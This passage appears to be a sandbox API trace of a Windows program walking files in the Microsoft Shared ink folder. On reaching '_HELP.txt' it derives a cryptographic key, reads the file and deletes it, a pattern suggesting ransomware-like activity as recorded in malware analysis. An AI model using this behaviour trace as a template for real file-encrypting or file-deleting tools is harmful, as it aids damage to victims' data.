WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="journal.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="journal.dll", lpUsedDefaultChar=0x0) returned 12 [0139.115] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.115] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.115] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.115] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.115] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.115] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.115] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.116] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.116] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.116] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.116] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.116] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.116] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.117] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.117] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.117] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.117] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.117] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.117] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="micaut.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="micaut.dll", lpUsedDefaultChar=0x0) returned 11 [0139.117] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Microsoft.Ink.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Ink.dll", lpUsedDefaultChar=0x0) returned 18 [0139.117] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mip.exe", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mip.exe", lpUsedDefaultChar=0x0) returned 8 [0139.117] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mraut.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mraut.dll", lpUsedDefaultChar=0x0) returned 10 [0139.117] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mshwgst.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshwgst.dll", lpUsedDefaultChar=0x0) returned 12 [0139.117] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mshwLatin.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshwLatin.dll", lpUsedDefaultChar=0x0) returned 14 [0139.117] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.118] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.118] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.118] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.118] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.118] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.118] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.118] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.118] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.118] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.118] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.118] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.118] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.119] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.119] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.119] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.119] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.119] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.119] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.120] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.120] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.120] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.120] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.120] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.120] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.120] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.120] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.120] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.120] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.120] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.120] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.121] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.121] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.121] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.121] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.121] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.121] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rtscom.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtscom.dll", lpUsedDefaultChar=0x0) returned 11 [0139.121] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.122] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.122] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.122] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.122] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.122] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.122] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShapeCollector.exe", lpUsedDefaultChar=0x0) returned 19 [0139.122] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.122] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.122] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.122] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.123] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.123] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.123] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.123] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.123] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.123] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.123] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.123] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.123] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.123] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.123] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.123] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.123] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.124] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.124] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.165] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.165] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.165] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.165] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.165] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.165] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TabIpsps.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TabIpsps.dll", lpUsedDefaultChar=0x0) returned 13 [0139.165] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tabskb.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tabskb.dll", lpUsedDefaultChar=0x0) returned 11 [0139.165] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TabTip.exe", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TabTip.exe", lpUsedDefaultChar=0x0) returned 11 [0139.165] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.166] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.166] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.166] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.166] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.166] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.166] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TipBand.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipBand.dll", lpUsedDefaultChar=0x0) returned 12 [0139.166] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TipRes.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipRes.dll", lpUsedDefaultChar=0x0) returned 11 [0139.166] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll", lpUsedDefaultChar=0x0) returned 12 [0139.166] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipskins.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipskins.dll", lpUsedDefaultChar=0x0) returned 13 [0139.166] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tiptsf.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tiptsf.dll", lpUsedDefaultChar=0x0) returned 11 [0139.166] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tpcps.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tpcps.dll", lpUsedDefaultChar=0x0) returned 10 [0139.166] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.167] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.167] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.167] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.167] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.167] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.167] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.167] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.167] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.167] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.167] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.167] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.167] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.209] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.209] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.209] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.209] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.210] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.210] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.210] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0139.210] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.210] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0139.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0139.210] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0139.210] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0139.210] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0139.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_HELP.txt", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_HELP.txt", lpUsedDefaultChar=0x0) returned 10 [0139.256] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0139.257] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0139.257] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0139.257] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0139.257] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0139.257] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0139.258] CryptDestroyHash (hHash=0x284d568) returned 1 [0139.258] CryptDestroyKey (hKey=0x284d628) returned 1 [0139.258] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0139.259] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\_HELP.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\_help.txt")) returned 1 [0139.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0139.260] FindClose (in: hFindFile=0x284d528 | out: hFindFile=0x284d528) returned 1 [0139.260] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 